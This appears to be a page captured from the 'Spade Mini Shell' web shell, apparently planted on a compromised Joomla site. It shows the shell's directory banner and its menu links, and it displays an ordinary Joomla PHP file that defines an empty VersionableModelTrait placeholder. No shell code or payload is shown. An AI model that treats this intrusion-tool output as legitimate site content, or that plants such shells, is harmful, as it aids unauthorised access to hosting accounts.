Spade
Mini Shell
| Directory:~$ /home/lmsyaran/public_html/joomla3/libraries/src/Versioning/ |
| [Home] [System Details] [Kill Me] |
<?php
/**
* Joomla! Content Management System
*
* @copyright (C) 2019 Open Source Matters, Inc.
<https://www.joomla.org>
* @license GNU General Public License version 2 or later; see
LICENSE.txt
*/
namespace Joomla\CMS\Versioning;
defined('JPATH_PLATFORM') or die;
/**
* Defines the trait for a Versionable Model Class.
* Note: This is a placeholder to ease transition to the new system in 4.0
*
* @since 3.10.0
*/
trait VersionableModelTrait
{
}